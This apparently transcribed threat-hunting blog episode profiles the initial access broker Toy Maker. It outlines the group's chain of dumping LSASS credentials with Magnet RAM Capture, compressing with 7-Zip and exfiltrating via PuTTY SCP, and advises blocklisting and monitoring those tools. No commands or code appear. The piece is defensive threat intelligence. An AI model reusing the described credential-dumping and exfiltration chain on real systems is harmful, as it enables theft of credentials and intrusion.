Threat Hunters Corner: Unmasking the Toy Maker Initial Access Broker

Welcome 

Welcome back to the Threat Hunters Corner! I’m Josh Shepard, Principal Threat Hunter at RADICL, and in this episode, we’ll be diving into the tools and tricks employed by a new Initial Access Broker known as ToyMaker.

RADBot Generated Text Summary 

Hey everyone, how's it going? 

Josh Shepard here, and on this edition of the Threat Hunters Corner, we're diving into the activities of a new initial access broker (IAB) known as Toy Maker. 

What is an Initial Access Broker? 

To refresh your memory, an initial access broker is a type of threat actor specializing in gaining initial persistent access to an environment. They then sell this access to the highest bidder, typically ransomware-as-a-service (RaaS) operators or their affiliates. These buyers leverage the persistent access to move laterally within the network and deploy their malware of choice.

Who is Toy Maker? 

Toy Maker has been observed collaborating with several ransomware gangs, including well-known groups such as Cactus. What sets Toy Maker apart is their innovative approach to credential gathering. 

Credential Gathering Techniques 

Toy Maker focuses on using legitimate tools for credential access. Specifically, they employ the open-source Magnet RAM Capture tool for OS credential dumping. Magnet RAM Capture is a legitimate digital forensics tool used to dump system memory. By capturing live system memory, attackers can access the LSASS (Local Security Authority Subsystem Service) process memory to gather credentials. These credentials are then packaged into their initial access offering, providing buyers with enhanced capabilities for lateral movement and privilege escalation. 

Toolchain and Exfiltration

After capturing the live system memory, Toy Maker continues to use legitimate tools to avoid detection. They use 7-Zip to compress the RAM capture and the PuTTY SCP client to transfer the file off-network. This trend of using malware-free, legitimate tools has been highlighted in CrowdStrike's 2025 Threat Report.

Detection and Prevention Strategies

Blocklisting Tools 

If your organization does not use Magnet RAM Capture or lacks a go-to forensics tool, consider blocklisting the execution of these binaries. This can be done from a hash or file name perspective. Additionally, you can detect and prevent unauthorized forensics tools by monitoring common command line parameters unique to Magnet RAM Capture. These parameters are harder for threat actors to alter compared to renaming files or changing file hashes.

Monitoring Data Exfiltration 

Another critical aspect to monitor is the use of the PuTTY SCP client for data exfiltration. If your organization does not use PuTTY, you can implement blanket detection or prevention measures. If PuTTY is used but only for SSH, restrict the usage of the PuTTY SCP client to prevent unauthorized data transfers. 

Tight Control Over Forensics Tools 

Digital forensic tools can gather extensive information from a system. Therefore, maintaining strict control over what is allowed to execute on your systems is crucial. This not only helps in catching malicious activities but also ensures that internal analysts do not perform unauthorized actions. 

Conclusion 

While Toy Maker employs legitimate tools to evade detection, understanding your environment and knowing which tools are in use can help you implement aggressive detection and prevention measures. This approach will not only help you catch Toy Maker but also deter other threat actors who might copy their techniques. 

That's it for this week's Threat Hunters Corner. If you have any questions, please feel free to reach out. Stay safe out there, and we'll see you next week.